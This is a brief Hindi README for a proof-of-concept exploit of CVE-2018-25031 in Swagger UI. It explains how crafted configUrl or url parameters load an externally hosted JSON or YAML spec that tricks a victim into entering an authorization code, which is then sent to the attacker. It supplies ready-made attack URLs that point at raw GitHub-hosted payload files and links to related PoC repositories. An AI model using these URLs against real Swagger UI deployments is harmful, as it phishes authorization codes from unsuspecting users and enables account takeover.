
CVE-2018-25031 (Swagger UI XSS) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो क्राफ्टेड configUrl/url पैरामीटर के माध्यम से प्राधिकरण कोड एक्सफिल्ट्रेट करता है।
एक सरल POC (CVE-2018-25031) जो पीड़ित को प्राधिकरण कोड दर्ज करने के लिए धोखा देता है, जो फिर हमलावर को भेज दिया जाता है।
आप इसे XSS भेद्यता के साथ उपयोग कर सकते हैं https://github.com/VictorNS69/swagger-ui-xss
पैरामीटर ढूंढना और सही फ़ाइल निर्दिष्ट करना आवश्यक है: configUrl के लिए JSON फ़ाइल, और url के लिए YAML फ़ाइल।
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031